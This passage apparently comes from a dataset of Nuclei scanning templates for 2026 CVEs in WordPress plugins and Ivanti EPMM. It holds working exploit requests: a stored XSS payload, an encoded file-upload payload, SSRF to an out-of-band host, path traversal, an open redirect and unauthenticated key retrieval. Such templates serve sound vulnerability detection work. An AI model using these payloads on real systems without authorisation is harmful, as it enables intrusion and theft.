action=qcld_wb_chatbot_conversation_save&session_id={{randstr}}&name=test&email=test%40test.com&phone=1234&conversation=%3Cli+class%3D%22wp-chat-user-msg%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%3C%2Fli%3E&security={{ajax_nonce}}&user_id=0\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"success\")'\n        condition: and\n# digest: 490a0046304402204521f1f0131138887cc036a79490055c924325f96aa82ecb792be0c0c56761bb022077f22eb84cdd8234fa6df463dc2043e87b2cbfeb8937e3333c802fb3f375b5df:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-13731.yaml","vuln_id":"cve-2026-13731"},{"raw":"id: CVE-2026-1368\n\ninfo:\n  name: Video Conferencing with Zoom API < 4.6.6 - Unauthenticated SDK Signature Generation\n  author: 0x_Akoko\n  severity: high\n  description: |\n    Zoom WordPress plugin < 4.6.6 contains a broken authentication caused by disabled nonce verification in an AJAX handler, letting unauthenticated attackers generate valid Zoom SDK signatures and retrieve the Zoom SDK key.\n  impact: |\n    Unauthenticated attackers can generate valid SDK signatures and retrieve the Zoom SDK key, potentially compromising meeting security.\n  remediation: |\n    Update to version 4.6.6 or later.\n  reference:\n    - https://wpscan.com/vulnerability/218e6655-c5aa-4bce-86b2-cad3bb20020c/\n    - https://wordpress.org/plugins/video-conferencing-with-zoom-api/\n    - https://plugins.trac.wordpress.org/browser/video-conferencing-with-zoom-api/\n  classification:\n    cve-id: CVE-2026-1368\n    epss-score: 0.01211\n    epss-percentile: 0.67128\n    cwe-id: CWE-862\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n  metadata:\n    verified: true\n    max-request: 2\n    fofa-query: body=\"/wp-content/plugins/video-conferencing-with-zoom-api/\"\n  tags: cve,cve2026,wordpress,wp-plugin,wp,zoom,vczapi,unauth,intrusive\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/video-conferencing-with-zoom-api/README.txt\"\n\n    extractors:\n      - type: regex\n        name: version\n        group: 1\n        regex:\n          - '(?i)Stable tag:\\s*([\\d.]+)'\n        internal: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"Video Conferencing with Zoom\")'\n          - 'compare_versions(version, \"<4.6.6\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=get_auth&meeting_id=123456789\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"\\\"success\\\":true\", \"\\\"sig\\\":\\\"eyJ\", \"\\\"type\\\":\\\"sdk\\\"\")'\n        condition: and\n\n    extractors:\n      - type: json\n        name: sdk_key\n        json:\n          - '.data.key'\n\n      - type: json\n        name: sdk_signature\n        json:\n          - '.data.sig'\n# digest: 4b0a0048304602210089af563072ad6b4755886d875ea144b8465dfc6a0f71cf7a4b6584aa1011dba1022100800855af52032d12c0325ea4249443cab24aa224316844a85f1f55758f1cde3a:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-1368.yaml","vuln_id":"cve-2026-1368"},{"raw":"id: CVE-2026-1357\n\ninfo:\n  name: WPvivid Backup & Migration <= 0.9.123 - Arbitrary File Upload\n  author: omarkurt\n  severity: critical\n  description: |\n    WPvivid Backup & Migration plugin for WordPress <= 0.9.123 contains an unauthenticated arbitrary file upload vulnerability caused by improper error handling in RSA decryption and lack of path sanitization, letting unauthenticated attackers upload arbitrary PHP files and achieve remote code execution via wpvivid_action=send_to_site parameter.\n  impact: |\n    Unauthenticated attackers can upload arbitrary PHP files and execute remote code, leading to full server compromise.\n  remediation: |\n    Update to the latest version of WPvivid Backup & Migration plugin.\n  reference:\n    - https://vulnerabletarget.com/VT-2026-1357\n    - https://github.com/LucasM0ntes/POC-CVE-2026-1357\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e5af0317-ef46-4744-9752-74ce228b5f37\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-1357\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-1357\n    epss-score: 0.32714\n    epss-percentile: 0.98269\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: wpvivid\n    product: wpvivid-backuprestore\n    shodan-query: http.component:\"WordPress\"\n    fofa-query: body=\"wp-content/plugins/wpvivid-backuprestore\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,wpvivid,file-upload,rce,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST / HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        wpvivid_action=send_to_site&wpvivid_content=MDAzQUJDMDAwMDAwMDAwMDAwMDExMDUGpYqxgOo0%2FZM3%2BLE%2B23CYS%2BI8Sbr6wwwU6dJweFxMk%2BOogH3GIpPZZMrm72oUS3vnrlf0AXv1vmGVBIbLo3QcQs%2B4JU7cLQw1kWByCFlYkpHcBuzxjEbVtT8VSdFgb6NLW6cpP4BdWT8bJx%2F%2FAOO09m3EFtf2sOcE%2BJjFJAew%2BELondwDkz3u5mssxGaQrlvWgaIlmPwz3FZx8dWC%2FHy7k4P3S5IJ7JV0tefjHJKCOzjPHngkZENu1uI2LmE6JaeF7XdXJCcmFOrNex4yJgIO0raawogHW457fM4wXKDnrM3bwxeLn5KwvAgadaTj4F9zWHxnjBmpa%2BtIaohISVcA5%2BGv6cAA95rzOoXBGUaI\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"result\":\"success\"'\n        internal: true\n\n      - type: status\n        status:\n          - 200\n        internal: true\n\n  - raw:\n      - |\n        GET /wp-content/uploads/vt-nuclei-test.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"CVE-2026-1357-nuclei-verification-test\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100e987ed18ea52f2ef9a21d9e2d87df62b558e737d5a03cc0f519dbe96d6f8f5b902205cd563c24b1a3caead47345115892aefc35c85f2cb0250e710e574285c68cd1a:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-1357.yaml","vuln_id":"cve-2026-1357"},{"raw":"id: CVE-2026-1340\n\ninfo:\n  name: Ivanti EPMM < 12.8.0.0 - Remote Code Execution\n  author: 0x_Akoko\n  severity: critical\n  description: |\n    Ivanti Endpoint Manager Mobile contains a code injection vulnerability allowing unauthenticated attackers to execute arbitrary code remotely, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can execute arbitrary code remotely, potentially leading to full system compromise.\n  remediation: |\n    Update to the latest version of Ivanti Endpoint Manager Mobile.\n  reference:\n    - https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-1340\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-1340\n    epss-score: 0.98676\n    epss-percentile: 0.99922\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: ivanti\n    product: endpoint_manager_mobile\n    shodan-query: http.title:\"Ivanti User Portal\"\n    fofa-query: title=\"Ivanti User Portal\" || body=\"ui.login.css\"\n  tags: cve,cve2026,ivanti,epmm,mobileiron,rce,kev,passive,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /mifs/user/login.jsp HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"Ivanti\")'\n          - 'compare_versions(version, \"< 12.8.0\")'\n        condition: and\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        internal: true\n        regex:\n          - 'ui\\.login\\.css\\?([0-9]+\\.[0-9]+(?:\\.[0-9]+)?)'\n\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - 'ui\\.login\\.css\\?([0-9]+\\.[0-9]+(?:\\.[0-9]+)?)'\n# digest: 490a004630440220264205fb64d1ac276df735ed7a71ba6e9fbbf71546ffd008ce243e4691764239022029e947d150e56c578c17212da78e77549c143ff12ae683e949e3352232505b05:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-1340.yaml","vuln_id":"cve-2026-1340"},{"raw":"id: CVE-2026-13153\n\ninfo:\n  name: Essential Blocks < 6.4.0 - Information Disclosure\n  author: str4k3r\n  severity: medium\n  description: |\n    Gutenberg Essential Blocks WordPress plugin < 6.4.0 contains an information disclosure caused by unrestricted access to a public REST route exposing non-public WooCommerce sales metrics, letting unauthenticated users read product sales data.\n  impact: |\n    Unauthenticated users can access sensitive sales metrics, potentially exposing business-sensitive information.\n  remediation: |\n    Update to version 6.4.0 or later.\n  reference:\n    - https://wpscan.com/vulnerability/0401a229-9630-49ab-ae4b-53360cf5d109/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-13153\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-13153\n    epss-score: 0.00921\n    epss-percentile: 0.58787\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2026,wordpress,wp-plugin,essential-blocks,woocommerce,unauth\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-json/essential-blocks/v1/products?per_page=20\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"sold_count\":'\n          - '\"title\"'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402204bc00882300fc3a3b1106feb009c152ce81f18c2449d98086c1db3fa1dc266830220720227722f4e4738eab7c0e57a87ae804b61e1208e53c5509036b66adb242d42:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-13153.yaml","vuln_id":"cve-2026-13153"},{"raw":"id: CVE-2026-13147\n\ninfo:\n  name: WordPress Kirki < 6.0.12 - Server-Side Request Forgery\n  author: 0x_Akoko\n  severity: high\n  description: |\n    Kirki WordPress plugin < 6.0.12 contains a server-side request forgery caused by lack of URL validation, letting unauthenticated attackers make the site issue HTTP requests to arbitrary hosts, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can make the server send HTTP requests to arbitrary hosts, potentially leading to internal network access or data exposure.\n  remediation: |\n    Update to version 6.0.12 or later.\n  reference:\n    - https://wpscan.com/vulnerability/kirki-ssrf\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-13147\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-13147\n    epss-score: 0.00912\n    epss-percentile: 0.585\n    cwe-id: CWE-918\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: developer-developer\n    product: kirki\n    framework: wordpress\n    publicwww-query: \"/wp-content/plugins/kirki/\"\n    shodan-query: http.html:\"/wp-content/plugins/kirki/\"\n    fofa-query: body=\"/wp-content/plugins/kirki/\"\n  tags: cve,cve2026,wordpress,wp-plugin,wp,kirki,ssrf,oast\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"window.wp_kirki\")'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: nonce\n        group: 1\n        internal: true\n        regex:\n          - 'nonce:\\s*\"([a-f0-9]{10})\"'\n\n  - raw:\n      - |\n        GET /wp-admin/admin-ajax.php?action=kirki_get_apis&endpoint=get-pre-built-html&elementUrl=http%3A%2F%2F{{interactsh-url}} HTTP/1.1\n        Host: {{Hostname}}\n        X-WP-Nonce: {{nonce}}\n\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n# digest: 4a0a0047304502210093ebbf55da35a3a25eb4c4f49e2082d3f2ca350d38ee8dff5088e7c9b922490b0220685c4cfb688729ded3fff66293e4c8e2deb2beec22356528199690d6becddf66:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-13147.yaml","vuln_id":"cve-2026-13147"},{"raw":"id: CVE-2026-1314\n\ninfo:\n  name: WordPress 3D FlipBook <= 1.16.17 - Information Disclosure\n  author: theamanrawat\n  severity: medium\n  description: |\n    WordPress 3D FlipBook - PDF Flipbook Viewer, Flipbook Image Gallery plugin versions <= 1.16.17 contain a missing authorization vulnerability in multiple AJAX endpoints. The fb3d_send_posts_in, fb3d_send_post_pages, fb3d_send_posts_in_pages, fb3d_send_posts_in_first_page, and fb3d_send_post_first_page handlers are registered with wp_ajax_nopriv hooks but fail to verify the post status of requested flipbook entries. This allows unauthenticated attackers to retrieve full metadata, PDF URLs, and configuration data of private, draft, and password-protected flipbook posts.\n  impact: |\n    Unauthenticated attackers can access sensitive flipbook metadata, potentially exposing confidential information.\n  remediation:\n    Upgrade the 3D FlipBook - PDF Flipbook Viewer, Flipbook Image Gallery plugin to version 1.16.18 or later.\n  reference:\n    - https://patchstack.com/database/wordpress/plugin/interactive-3d-flipbook-powered-physics-engine/vulnerability/wordpress-3d-flipbook-pdf-embedder-pdf-flipbook-viewer-flipbook-image-gallery-plugin-1-16-17-missing-authorization-to-unauthenticated-private-draft-flipbook-data-exposure-vulnerability\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-1314\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cwe-id: CWE-862\n    cve-id: CVE-2026-1314\n    epss-score: 0.00892\n    epss-percentile: 0.57914\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: iberezansky\n    product: interactive_3d_flipbook\n    framework: wordpress\n    shodan-query: http.html:\"/wp-content/plugins/interactive-3d-flipbook-powered-physics-engine/\"\n    fofa-query: body=\"/wp-content/plugins/interactive-3d-flipbook-powered-physics-engine/\"\n  tags: cve,cve2026,wordpress,wp-plugin,wp,3d-flipbook,exposure\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/interactive-3d-flipbook-powered-physics-engine/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"3D FlipBook\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /wp-admin/admin-ajax.php?action=fb3d_send_posts HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"code\":0'\n          - '\"title\":'\n          - '\"post_type\":\"3d-flip-book\"'\n          - '\"post_name\":\"\"'\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - application/json\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100b0d888ee1bc7ef9917ec141aa5af06dc4b51e3ace4524e01b63c138ed860ef7d0221009fd89a9c0aa8437ba17182b659c6ee2ca8c44c786e8081835bfb8dd6fb8ef012:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-1314.yaml","vuln_id":"cve-2026-1314"},{"raw":"id: CVE-2026-1306\n\ninfo:\n  name: WordPress midi-Synth <= 1.1.0 - Unauthenticated Arbitrary File Upload\n  author: pussycat0x\n  severity: critical\n  description: |\n    WordPress midi-Synth plugin \\u003C= 1.1.0 contains an unrestricted file upload vulnerability caused by missing file type and extension validation in the 'export' AJAX action, letting unauthenticated attackers upload arbitrary files and potentially execute remote code, exploit requires attacker to obtain a valid nonce exposed in frontend JavaScript.\n  impact: |\n    Unauthenticated attackers can upload arbitrary files and potentially execute remote code on the server.\n  remediation: |\n    Update to the latest version of midi-Synth plugin.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/midi-synth/midi-synth-110-unauthenticated-arbitrary-file-upload-via-export-ajax-action\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-1306\n    epss-score: 0.04458\n    epss-percentile: 0.90994\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: wordpress\n    product: midi-synth\n    framework: wordpress\n  tags: cve,cve2026,wordpress,wp-plugin,midi-synth,file-upload,rce,intrusive\n\nvariables:\n  randstr: \"{{rand_base_string(8)}}\"\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Origin: {{BaseURL}}\n        Referer: {{BaseURL}}/\n\n        action=export&nonce={{nonce}}&fileName={{randstr}}.txt&fileMidi={{base64(\"{{randstr}}\")}}\n\n      - |\n        GET /wp-content/plugins/midi-synth/sound/{{randstr}}.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: nonce\n        part: body\n        internal: true\n        regex:\n          - 'var midiSynth_nonce     = \"([a-z0-9]+)\"'\n        group: 1\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code_3 == 200\n          - contains(body_3, \"{{randstr}}\")\n        condition: and\n# digest: 4b0a00483046022100c8a8675bf32737d1f68f37077cf9161a6f58575f574eb0dd27e2ada2e4cf3eca022100f97565c44100678d88f5536146a2e89e6074b8163924e0f73359adb4b9194329:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-1306.yaml","vuln_id":"cve-2026-1306"},{"raw":"id: CVE-2026-13001\n\ninfo:\n  name: Podlove Podcast Publisher <= 4.5.1 - Arbitrary File Upload\n  author: aryu-ru\n  severity: critical\n  description: |\n    Podlove Podcast Publisher plugin for WordPress through 4.5.1 is vulnerable to arbitrary file uploads due to missing file type validation in the podlove_handle_cache_files function. The image cache derives the stored file extension from the path of the attacker supplied source URL, while the image validation is performed against a different file name taken from the full source URL, so a source URL whose path carries a dangerous extension is written to the cache with that extension.\n  impact: |\n    An unauthenticated attacker can write files with an arbitrary extension into the web accessible cache directory, which may make remote code execution and full site compromise possible.\n  remediation: |\n    Update Podlove Podcast Publisher to version 4.5.2 or later.\n  reference:\n    - https://github.com/podlove/podlove-publisher/commit/5b32468601e903bae2bcacfaf36ff583d2bc9387\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f81a3429-f378-4295-adbe-ad6f1df59701?source=cve\n    - https://github.com/advisories/GHSA-7gcx-p8g5-3g9x\n    - https://plugins.trac.wordpress.org/changeset/3597461/podlove-podcasting-plugin-for-wordpress\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-13001\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-13001\n    epss-score: 0.03757\n    epss-percentile: 0.89407\n    cwe-id: CWE-20\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: podlove\n    product: podlove-podcasting-plugin-for-wordpress\n    framework: wordpress\n    shodan-query: http.html:\"/wp-content/plugins/podlove-podcasting-plugin-for-wordpress\"\n    fofa-query: body=\"/wp-content/plugins/podlove-podcasting-plugin-for-wordpress\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,podlove,file-upload,intrusive\n\nvariables:\n  rnd: \"{{randstr}}\"\n  marker: \"{{to_lower(rnd)}}\"\n  source: \"{{RootURL}}/{{marker}}.txt?/wp-content/plugins/podlove-podcasting-plugin-for-wordpress/images/logo/podlove-publisher-icon-500.png\"\n  cid: \"{{md5(concat(source,marker))}}\"\n\nhttp:\n  - raw:\n      - |\n        GET /?podlove_image_cache_url={{hex_encode(source)}}&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name={{marker}} HTTP/1.1\n        Host: {{Hostname}}\n\n      - |\n        GET /wp-content/cache/podlove/{{substr(cid,0,2)}}/{{substr(cid,2)}}/{{marker}}_original.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(hex_encode(body_2), \"89504e470d0a1a0a\")'\n          - 'contains(header_2, \"text/plain\")'\n          - 'status_code_2 == 200'\n        condition: and\n# digest: 4a0a004730450220122a1f4c0128eb1179936ded4a7c7e303ed3a12d5bbced1c81795f03ad739d2b0221009cc19b0f69d915512a026b28c26fff6dc8fd2b9efb7f2cc00fa22c47e519dba0:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-13001.yaml","vuln_id":"cve-2026-13001"},{"raw":"id: CVE-2026-1296\n\ninfo:\n  name: Frontend Post Submission Manager Lite <= 1.2.7 - Open Redirect\n  author: Shivam Kamboj\n  severity: medium\n  description: |\n    The Frontend Post Submission Manager Lite plugin for WordPress is vulnerable to Open Redirection in all versions up to, and including, 1.2.7 due to insufficient validation on the 'requested_page' POST parameter in the verify_username_password function. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action such as clicking on a link.\n  impact: |\n    Unauthenticated attackers can redirect users to malicious sites, potentially leading to phishing or malware exposure.\n  remediation: |\n    Update to a version later than 1.2.7 or the latest available version.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/frontend-post-submission-manager-lite/frontend-post-submission-manager-lite-127-unauthenticated-open-redirect-via-requested-page-parameter\n    - http://nvd.nist.gov/vuln/detail/CVE-2026-1296\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-1296\n    epss-score: 0.0046\n    epss-percentile: 0.39136\n    cwe-id: CWE-601\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2026,wordpress,wp,wp-plugin,redirect,frontend-post-submission-manager-lite\n\nhttp:\n  - raw:\n      - |\n        POST /wp-login.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        log=&pwd=&wp-submit=Log+In&action=login&requested_page=https://oast.pro\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: header\n        regex:\n          - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n\n      - type: status\n        status:\n          - 302\n# digest: 4a0a00473045022009e07d95dd01715240a2ccdd9c3774f7775cf2c80d02c5cf8ff339ef3b9fb7ff022100959457e1ea86c68016cf3e5b82d5daa932e33732668260a7b3337b1129290b3d:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-1296.yaml","vuln_id":"cve-2026-1296"},{"raw":"id: CVE-2026-12898\n\ninfo:\n  name: All-in-One WP Migration and Backup < 7.106 - Arbitrary Log File Write\n  author: iamatownboy\n  severity: medium\n  description: |\n    The All-in-One WP Migration and Backup WordPress plugin before 7.106 does not properly sanitise a user-supplied value before using it to build a file path. This makes it possible for unauthenticated attackers to create or append a log file in arbitrary locations outside the intended storage directory.\n  impact: |\n    Unauthenticated attackers can write log files outside the plugin storage directory, potentially leading to information disclosure or further compromise.\n  remediation: |\n    Update All-in-One WP Migration and Backup to version 7.106 or later.\n  reference:\n    - https://wpscan.com/vulnerability/c90553e4-8e1a-4c99-a28f-a0de8d635caa/\n    - https://wordpress.org/plugins/all-in-one-wp-migration/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-12898\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\n    cvss-score: 6.5\n    cve-id: CVE-2026-12898\n    epss-score: 0.01352\n    epss-percentile: 0.70328\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: servmask\n    product: all-in-one-wp-migration\n    framework: wordpress\n    shodan-query: html:\"/wp-content/plugins/all-in-one-wp-migration/\"\n    fofa-query: body=\"/wp-content/plugins/all-in-one-wp-migration/\"\n    publicwww-query: \"/wp-content/plugins/all-in-one-wp-migration/\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,all-in-one-wp-migration,traversal,log-write\n\nvariables:\n  logname: \"{{rand_text_alpha(8)}}\"\n  padding: \"{{repeat('p=1&', 5200)}}\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(body, \"All-in-One WP Migration\")\n          - compare_versions(version, \"< 7.106\")\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - '(?i)Stable tag:\\s*([0-9.]+)'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=ai1wm_export&secret_key=invalidkey&storage=/../../../../uploads/{{logname}}&{{padding}}end=1\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/uploads/{{logname}}.log\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains_any(body, \"Input variables exceeded\", \"PHP Request Startup\")\n        condition: and\n# digest: 4a0a0047304502203c2e20eb8840b0ab939bd60ef17f992f7e91bcbddd87ed3b5f13b9871e3c7664022100861024fde290c3f86696389cfa057f372e668490f5615c8e8bdf080794cfc4e2:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-12898.yaml","vuln_id":"cve-2026-12898"},{"raw":"id: CVE-2026-1281\n\ninfo:\n  name: Ivanti EPMM <=12.7.0.0 - Unauthenticated Code Injection\n  author: rxerium\n  severity: critical\n  description: |\n    Ivanti Endpoint Manager Mobile (EPMM) versions 12.5.0.0 through 12.7.0.0 contain a code injection vulnerability that allows unauthenticated remote attackers to achieve arbitrary code execution on the target system.\n  impact: |\n    Unauthenticated remote attackers can execute arbitrary code on the EPMM appliance, leading to full system compromise. This vulnerability is actively exploited in the wild and listed in the CISA Known Exploited Vulnerabilities catalog.\n  remediation: |\n    Apply the Ivanti security patch for EPMM or upgrade to a version above 12.7.0.0. Restrict network access to the EPMM management interface.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-1281\n    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog\n    - https://www.helpnetsecurity.com/2026/01/30/ivanti-epmm-cve-2026-1281-cve-2026-1340/\n    - https://www.cisa.gov/news-events/alerts/2026/01/29/cisa-adds-one-known-exploited-vulnerability-catalog\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-1281\n    epss-score: 0.98575\n    epss-percentile: 0.99921\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: ivanti\n    product: endpoint-manager-mobile\n    shodan-query: product:\"Ivanti Endpoint Manager Mobile (EPMM)\"\n  tags: cve,cve2026,ivanti,epmm,code-injection,rce,unauth,kev,vkev,passive\n\nhttp:\n  - raw:\n      - |\n        GET /mics/login.jsp HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"<title>Ivanti System Manager: Sign In\")'\n          - 'contains(body, \"Ivanti. All rights reserved.\")'\n        condition: and\n\n      - type: dsl\n        dsl:\n          - '(compare_versions(version, \">= 12.5.0.0\") && compare_versions(version, \"< 12.6.0.0\")) || (compare_versions(version, \">= 12.6.0.0\") && compare_versions(version, \"<= 12.7.0.0\"))'\n\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - '<div[^>]*class=\"[^\"]*product-version[^\"]*\"[^>]*>\\s*([0-9.]+)\\s*</div>'\n\n      - type: regex\n        name: detected_version\n        part: body\n        group: 1\n        regex:\n          - '<div[^>]*class=\"[^\"]*product-version[^\"]*\"[^>]*>\\s*([0-9.]+)\\s*</div>'\n# digest: 4b0a00483046022100b49b10b9a16db078ea1cdb53f3bf076753dafe6b8e85a393bf2e27224db0325d022100baaec9fa38da93ebe48f24fd9718a945983ddaf8ef52a5ecda88f360850d92f7:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-1281.yaml","vuln_id":"cve-2026-1281"},{"raw":"id: CVE-2026-1277\n\ninfo:\n  name: URL Shortify <= 1.12.1 - Open Redirect\n  author: Shivam Kamboj\n  severity: medium\n  description: |\n    The URL Shortify plugin for WordPress is vulnerable to Open 